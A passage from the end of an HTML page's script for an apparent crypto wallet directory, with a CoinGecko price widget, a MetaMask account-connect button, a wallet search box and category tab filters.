        // Remove the modal from view; the form will be submitted normally to the server
        modal.classList.add("hidden");
      }
    });

    // Crypto widget: Fetch live crypto prices using CoinGecko free API
    async function fetchCryptoPrices() {
      const cryptoPricesDiv = document.getElementById("cryptoPrices");
      try {
        const response = await fetch("https://api.coingecko.com/api/v3/simple/price?ids=bitcoin,ethereum,binancecoin&vs_currencies=usd");
        const data = await response.json();
        cryptoPricesDiv.innerHTML = "";
        for (const coin in data) {
          const priceCard = document.createElement("div");
          priceCard.className = "crypto-price-card bg-gray-100 p-4 rounded-md text-center shadow";
          priceCard.innerHTML = `<h3 class="font-semibold capitalize">${coin}</h3><p class="text-lg font-bold text-blue-600">$${data[coin].usd}</p>`;
          cryptoPricesDiv.appendChild(priceCard);
        }
      } catch (error) {
        console.error("Error fetching crypto prices:", error);
      }
    }

    // Wallet connect function using MetaMask (Web3 integration)
    function connectWallet() {
      if (window.ethereum) {
        window.ethereum.request({ method: "eth_requestAccounts" })
          .then(() => {
            alert("Wallet connected successfully!");
          })
          .catch(err => {
            console.error(err);
            alert("Failed to connect wallet.");
          });
      } else {
        alert("No Ethereum wallet found. Please install MetaMask.");
      }
    }

    // Search wallet filter
    document.getElementById("searchWallet").addEventListener("input", function(e) {
      currentSearch = e.target.value.toLowerCase();
      generateWalletCards();
    });

    // Classification filter: attach event listeners to tab buttons
    const tabItems = document.querySelectorAll(".tab-item");
    tabItems.forEach(tab => {
      tab.addEventListener("click", function() {
        // Remove "active" class from all tabs
        tabItems.forEach(t => t.classList.remove("active"));
        // Set current category filter from data attribute
        currentCategory = this.getAttribute("data-category");
        this.classList.add("active");
        generateWalletCards();
      });
    });

    // Initialize wallet cards and crypto prices widget
    generateWalletCards();
    fetchCryptoPrices();
  </script>
  
  <!-- Footer Include -->
</body>
</html>
